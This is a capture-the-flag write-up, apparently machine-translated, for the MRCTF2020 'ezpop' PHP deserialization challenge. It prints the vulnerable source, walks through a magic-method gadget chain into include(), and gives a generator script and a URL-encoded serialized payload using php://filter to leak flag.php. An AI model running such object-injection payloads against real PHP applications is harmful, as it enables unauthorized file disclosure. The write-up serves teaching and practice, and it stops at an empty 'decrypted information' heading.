[mrctf2020]ezpop-1 | PHP serialization

High quality resource sharing

1、 Open the topic to get the source code information , as follows ：

Welcome to index.php
php</span
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
 protected $var;
 public function append($value){
 include($value);
 }
 public function \_\_invoke(){
 $this->append($this->var);
 }
}

class Show{
 public $source;
 public $str;
 public function \_\_construct($file='index.php'){
 $this->source = $file;
 echo 'Welcome to '.$this->source."";
 }
 public function \_\_toString(){
 return $this->str->source;
 }

 public function \_\_wakeup(){
 if(preg\_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
 echo "hacker";
 $this->source = "index.php";
 }
 }
}

class Test{
 public $p;
 public function \_\_construct(){
 $this->p = array();
 }

 public function \_\_get($key){
 $function = $this->p;
 return $function();
 }
}

if(isset($\_GET['pop'])){
 @unserialize($\_GET['pop']);
}
else{
 $a=new Show;
 highlight\_file(\_\_FILE\_\_);
} Fold  

2、 Our ultimate goal is to acquire flag.php Medium flag Information , So analyze the source code information , See where you can get flag.php file , Found in Modifier Class include($value), So I thought I could pass php Pseudo protocol to get flag.php Information about , So now our goal is to call append function , Then look down , Find out __invoke The function is called append function , So we just have to execute __invoke Function can also be obtained flag Information , How do you do that __invoke Function? ：

therefore , At this point, we should use other functions to call Modifier An object of , Continue to observe the source code and find that only test Class __get Function received parameter value , So we will Modifier Object passed in to __get Function , So the goal now is to execute __get function , And how to implement it __get Function? ：

So a function is needed to call test Properties that do not exist in the class , Notice this line of code here ：$this->str->source, There are two here -> Well , Because here str Namely test An object of class , And then call test Object of class soucre attribute , But this attribute is in test It doesn't exist in the class , So it will execute __get Method , So now we are going to execute __toString function , Then how should we implement __toString Function? ：

So at this point we need to execute show Class __construct Function to execute __toString Function and __construct Function echo 'Welcome to '.$this->source.""inOf$this->source You need to be an object to execute __toString function , So you need to create show Class object and assignment $this->source object .

3、 After analysis, you need to write a script according to the analysis process , The script is as follows ：

php</span
class Modifier {
 protected $var='php://filter/read=convert.base64-encode/resource=flag.php';
}
class Show{
 public $source;
 public $str;
}
class Test{
 public $p;
}
$a= new Show();
$a->source=new Show();
$a->source->str=new Test();
$a->source->str->p=new Modifier();
echo urlencode(serialize($a));

payload:O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

4、 Access and get encrypted flag.php file , Conduct base64 Decrypt , give the result as follows ：

flag.php file ：

PD9waHAKY2xhc3MgRmxhZ3sKICAgIHByaXZhdGUgJGZsYWc9ICJmbGFnezg1YmQ4NzVjLTNiNjktNGExOS05MTQ0LTRlYmM0NzlhYjZjNH0iOwp9CmVjaG8gIkhlbHAgTWUgRmluZCBGTEFHISI7Cj8+

Decrypted information ：